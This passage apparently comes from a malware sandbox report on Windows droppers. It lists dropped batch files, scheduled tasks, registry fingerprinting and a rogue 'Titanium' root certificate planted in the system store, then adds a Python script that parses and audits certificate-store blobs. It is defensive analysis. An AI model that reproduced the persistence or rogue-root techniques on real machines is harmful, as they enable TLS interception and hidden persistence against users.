| File created | C:\Program Files (x86)\GameServerClient\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\GameServerClient.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\GameServerClientC.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explorta.job | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| File created | C:\Windows\Tasks\chrosha.job | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| File created | C:\Windows\Tasks\bWycNackLSywaqkmgR.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-801878912-692986033-442676226-1000\{74D2DA2C-2C4C-4DE5-BDE1-9C6329FD455E} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000000020000000100000 0cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
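The Blob that keks.exe writes under ROOT\Certificates above is a CryptoAPI certificate-context serialization: a run of property records, each a DWORD property id, a DWORD reserved field (always 1), a DWORD length and the data. In this entry the records are 0x0B (friendly name "Titanium Root Certificate Authority"), 0x02 (key-provider info naming a container GUID and "Microsoft Enhanced Cryptographic Provider v1.0", the shape an entry has when the certificate was imported together with a private-key reference), 0x03 (the SHA-1 thumbprint, which is also the key name) and 0x20 (the DER certificate, 778 bytes: self-signed, basicConstraints CA:TRUE, extended key usage serverAuth, valid 2023-03-14 to 2026-06-17). A root like that makes any TLS leaf it signs validate in every client that trusts the Windows store. The Python below is an added example, not sandbox output and not the malware's code: it parses the blob format, recovers the DER and checks that the stored hash, the key name and the certificate bytes agree. It runs on a constructed blob whose "certificate" is a stand-in SEQUENCE carrying only the CN, since a full X.509 is not needed to show the check; to audit the real entry, pass bytes.fromhex() of the hex after "Blob =" and the key name F1A578C4CB5DE79A370893983FD4DA8B67B2B064.

```python
"""Parse the Blob value a CryptoAPI certificate store writes under
SystemCertificates\\<store>\\Certificates\\<SHA-1>\\Blob, recover the DER
certificate, and check that the stored SHA-1 property matches both the
certificate bytes and the registry key name."""
import hashlib
import struct

# Property IDs from wincrypt.h; the report's ROOT entry carries exactly these four.
CERT_KEY_PROV_INFO_PROP_ID = 0x02
CERT_SHA1_HASH_PROP_ID = 0x03
CERT_FRIENDLY_NAME_PROP_ID = 0x0B
CERT_CERT_PROP_ID = 0x20


def parse_cert_blob(blob: bytes) -> dict:
    """Split a Blob into {property_id: data}. Each record is
    <propid:u32le><reserved:u32le, always 1><cb:u32le><cb data bytes>.
    A short or malformed record raises so a damaged dump is not mis-read."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, cb = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + cb > len(blob):
            raise ValueError(f"malformed property {prop_id:#x} at offset {off - 12}")
        props[prop_id] = blob[off:off + cb]
        off += cb
    return props


def der_strings(der: bytes) -> list:
    """Collect UTF8String (0x0C), PrintableString (0x13) and IA5String (0x16)
    leaves by walking every constructed DER node. Not an X.509 parser, but
    enough to read the subject/issuer CN of a dropped root."""
    out = []

    def walk(buf: bytes) -> None:
        i = 0
        while i + 2 <= len(buf):
            tag, length, hdr = buf[i], buf[i + 1], 2
            if length & 0x80:                       # long-form length
                n = length & 0x7F
                if not 1 <= n <= 4 or i + 2 + n > len(buf):
                    return                          # malformed: stop this node
                length = int.from_bytes(buf[i + 2:i + 2 + n], "big")
                hdr = 2 + n
            body = buf[i + hdr:i + hdr + length]
            if len(body) != length:
                return
            if tag & 0x20:                          # constructed: SEQUENCE, SET, [n]
                walk(body)
            elif tag in (0x0C, 0x13, 0x16):
                out.append(body.decode("utf-8", "replace"))
            i += hdr + length

    walk(der)
    return out


def audit_store_entry(key_name: str, blob: bytes) -> dict:
    """Cross-check the three places the thumbprint appears: the key name, the
    0x03 property and SHA-1 over the 0x20 certificate bytes."""
    props = parse_cert_blob(blob)
    der = props[CERT_CERT_PROP_ID]
    thumbprint = hashlib.sha1(der).hexdigest().upper()
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\x00")
    return {
        "friendly_name": name,
        "thumbprint": thumbprint,
        "stored_hash_matches": stored == thumbprint,
        "key_name_matches": key_name.upper() == thumbprint,
        "has_key_provider_info": CERT_KEY_PROV_INFO_PROP_ID in props,
        "names_in_cert": der_strings(der),
        "der_length": len(der),
    }


# --- constructed sample input (not the report's blob) -----------------------
def _tlv(tag: int, body: bytes) -> bytes:
    """Minimal DER TLV encoder (short- and long-form lengths)."""
    if len(body) < 0x80:
        return bytes([tag, len(body)]) + body
    lb = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _prop(prop_id: int, data: bytes) -> bytes:
    return struct.pack("<III", prop_id, 1, len(data)) + data


def build_sample_blob(friendly: str, der: bytes) -> bytes:
    """Blob in the same property order as the report's ROOT entry."""
    return (_prop(CERT_FRIENDLY_NAME_PROP_ID, (friendly + "\x00").encode("utf-16-le"))
            + _prop(CERT_KEY_PROV_INFO_PROP_ID, b"\x00" * 16)   # placeholder container info
            + _prop(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest())
            + _prop(CERT_CERT_PROP_ID, der))


# Stand-in certificate: nested SEQUENCE/SET holding only the CN the report shows.
# It is NOT an X.509 certificate; only its bytes and their hash matter to the check.
SAMPLE_CN = "Titanium Root Certificate Authority"
SAMPLE_DER = _tlv(0x30, _tlv(0x31, _tlv(0x30, _tlv(0x0C, SAMPLE_CN.encode()))))
SAMPLE_BLOB = build_sample_blob(SAMPLE_CN, SAMPLE_DER)
SAMPLE_KEY = hashlib.sha1(SAMPLE_DER).hexdigest().upper()

if __name__ == "__main__":
    for k, v in audit_store_entry(SAMPLE_KEY, SAMPLE_BLOB).items():
        print(f"{k:>22}: {v}")
```

A mismatch between the 0x03 property and SHA-1 of the 0x20 bytes, or between either and the key name, means the entry was hand-written rather than imported through CertAddCertificateContextToStore, and is worth a look on its own. The presence of 0x02 is the other thing to note: it ties the root to a key container on the host, so the dropper can mint leaf certificates locally.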
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
